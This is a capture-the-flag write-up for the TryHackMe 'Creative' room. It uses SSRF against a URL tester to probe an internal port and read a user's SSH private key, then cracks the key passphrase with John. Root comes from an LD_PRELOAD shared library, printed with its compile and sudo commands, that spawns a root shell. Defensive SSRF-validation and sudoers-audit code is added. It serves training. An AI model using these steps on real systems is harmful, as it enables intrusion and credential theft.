Creative
Exploit a vulnerable web application and some misconfigurations to gain root privileges.
Recon
Let's start with an nmap scan.
The Nmap scan results show only two open ports: port 22, running SSH, and port 80, hosting a web server running nginx 1.18.0.
┌──(kali㉿kali)-[~]
└─$ nmap -p- -T4 creative.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 11:48 BST
Host is up (0.17s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 430.03 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -p 22,80 -sC -sV -T4 creative.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 11:56 BST
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 11:56 (0:00:06 remaining)
Nmap scan report for creative.thm (10.10.127.96)
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 a0:5c:1c:4e:b4:86:cf:58:9f:22:f9:7c:54:3d:7e:7b (RSA)
| 256 47:d5:bb:58:b6:c5:cc:e3:6c:0b:00:bd:95:d2:a0:fb (ECDSA)
|_ 256 cb:7c:ad:31:41:bb:98:af:cf:eb:e4:88:7f:12:5e:89 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Creative Studio | Free Bootstrap 4.3.x template
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.94 seconds
Visiting the site, it appears to be a landing page for UI/UX, web development and app design services.

Feroxbuster didn't reveal any directories worth looking at.
Subdomain enumeration revealed a subdomain, beta.creative.thm.

After adding it to /etc/hosts we can visit the site. It hosts a beta URL tester that checks whether a provided URL is live or dead; if the URL is live, we get redirected to the corresponding page. Since the server fetches whatever URL it is given, this setup looks like a candidate for Server-Side Request Forgery (SSRF).



We can use ffuf to port-scan the internal host by generating a port list with the seq command. After a short while, we identify port 1337. The scan pauses briefly on port 5000, likely because beta.creative.thm itself is served internally on that port, so the tester ends up calling itself and the request is delayed; the scan resumes shortly afterward.

Requesting the endpoint on 1337:
http://127.0.0.1:1337/


We request /home and find a directory called saad, which contains user.txt.
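As an added example (not code from the original writeup or from the room's application), here is the server-side validation that would have stopped the URL tester from being used to reach 127.0.0.1:1337: it accepts only http(s) on the default ports and rejects any hostname that resolves to a non-global address. The resolver table is constructed so the block runs offline; a real deployment would substitute socket.getaddrinfo().

```python
import ipaddress
from urllib.parse import urlparse

# Constructed resolver table so the check runs offline. A real deployment
# would call socket.getaddrinfo() and test every address it returns.
FAKE_DNS = {
    "beta.creative.thm": ["10.10.127.96"],  # address from the nmap output above
    "example.com": ["93.184.216.34"],        # constructed public address
}
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def resolve(host, resolver=FAKE_DNS):
    """Map a hostname to its addresses; an IP literal maps to itself."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return resolver.get(host.lower(), [])


def is_safe_target(url, resolver=FAKE_DNS):
    """True only if fetching url cannot reach the checker's own host or its
    internal network: http(s) only, default ports only, no credentials in
    the URL, and every resolved address must be globally routable."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    if parts.username or parts.password:  # http://user@host@... confusion
        return False
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:  # malformed or out-of-range port
        return False
    if port not in ALLOWED_PORTS:  # stops 127.0.0.1:1337-style port probing
        return False
    addrs = resolve(parts.hostname, resolver)
    if not addrs:  # unresolvable name: fail closed
        return False
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        if not ip.is_global:  # loopback, private, link-local, reserved
            return False
    return True
```

Because the tester follows redirects, the same check must be applied to each redirect target before it is followed (with requests, fetch with allow_redirects=False and loop), otherwise an allowed external URL can bounce the server to an internal one.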

Initial Access
We can also find the private SSH key of saad in the .ssh folder.
http://127.0.0.1:1337/home/saad/.ssh/id_rsa

After saving the key and adjusting permissions accordingly, we attempt to log in via SSH as Saad. However, we encounter a prompt requesting a passphrase for the SSH key.

We feed the SSH key into ssh2john to produce a hash that can be cracked with John the Ripper.
Next, we crack the hash using John with rockyou.txt and get the passphrase for the key.
┌──(kali㉿kali)-[~/Desktop/THM/creative]
└─$ ssh2john id_rsa > id_rsa.hash
┌──(kali㉿kali)-[~/Desktop/THM/creative]
└─$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

With the passphrase obtained, we successfully log in as the user Saad. In the user's home directory, we locate the first flag, which was previously accessible via the beta.creative.thm website.

Privilege Escalation
sudo -l asks for a password; however, while enumerating the user's home directory we discover a .bash_history file with valuable content: it holds the credentials of the user Saad.

With the obtained credentials, we can run sudo -l. We find that we have permission to run /usr/bin/ping with sudo privileges. On its own, this does not provide a straightforward path to privilege escalation.
Fortunately for us, there's another option available: env_keep+=LD_PRELOAD.
LD_PRELOAD is an environment variable used on Unix-like systems to load the listed shared libraries before all others when a program starts, which lets their functions override functions in other shared libraries.
A default sudoers configuration uses env_reset, which strips LD_PRELOAD along with the other loader variables; env_keep+=LD_PRELOAD undoes that protection. If an attacker can point LD_PRELOAD at a malicious shared library, and sudo preserves the variable when running commands, arbitrary code runs with elevated privileges.
We make use of a provided resource containing a shared library written in C for exactly this technique. The library defines a function that elevates privileges to root by setting the user and group IDs to zero and spawning a shell, which gives the user a root shell.
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs when the loader maps this library; with -nostartfiles, _init is
   our own entry point rather than the C runtime's. */
void _init(void) {
    unsetenv("LD_PRELOAD");   /* stop the spawned shell from preloading us again */
    setgid(0);                /* the process is already root via sudo */
    setuid(0);
    system("/bin/sh");
}
We compile the C code into a shared library.
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
ls -al shell.so
Next, we execute the ping command with sudo while setting LD_PRELOAD to the crafted shared library. This gives us a root shell, from which we can read the root flag located in /root.
sudo LD_PRELOAD=/tmp/shell.so /usr/bin/ping
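As an added defensive example (not from the original writeup), a small auditor that flags the env_keep misconfiguration used above in a sudoers file and shows the weak excerpt next to the corrected one. The sudoers text is constructed to match what the writeup reports for saad; the check is a simplified line-based parse, not a full sudoers grammar.

```python
import re

# Constructed sudoers excerpt modelled on what the writeup reports for saad:
# ping is allowed via sudo and LD_PRELOAD survives sudo's env_reset.
SUDOERS_WEAK = """\
Defaults        env_reset
Defaults        mail_badpass
Defaults        env_keep+=LD_PRELOAD
root    ALL=(ALL:ALL) ALL
saad    ALL=(root) /usr/bin/ping
"""

# The fix: drop the env_keep line so env_reset strips the loader variables.
SUDOERS_FIXED = "\n".join(
    line for line in SUDOERS_WEAK.splitlines() if "env_keep" not in line
) + "\n"

# Variables that make the dynamic loader pull caller-chosen code into
# whatever command sudo runs, so they must never be kept.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}

# Matches 'Defaults[...] env_keep += "VAR VAR"' and 'env_keep+=VAR' forms;
# a simplified line-based parser, not a full sudoers grammar.
ENV_KEEP_RE = re.compile(
    r'^\s*Defaults\b[^#\n]*?\benv_keep\s*\+?=\s*"?([^"#\n]*)"?', re.M
)


def kept_loader_vars(sudoers_text):
    """Return the loader-related variables that env_keep preserves."""
    found = set()
    for match in ENV_KEEP_RE.finditer(sudoers_text):
        for var in match.group(1).split():
            if var.upper() in LOADER_VARS:
                found.add(var.upper())
    return found


def audit(sudoers_text):
    """One finding per kept loader variable; an empty list means clean."""
    return [
        f"env_keep preserves {var}: any sudo-permitted command, even "
        f"/usr/bin/ping, can be made to load arbitrary code as root"
        for var in sorted(kept_loader_vars(sudoers_text))
    ]
```

Run it over /etc/sudoers and every file under /etc/sudoers.d; the same condition is visible to a user in the "env_keep" line of their own sudo -l output.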
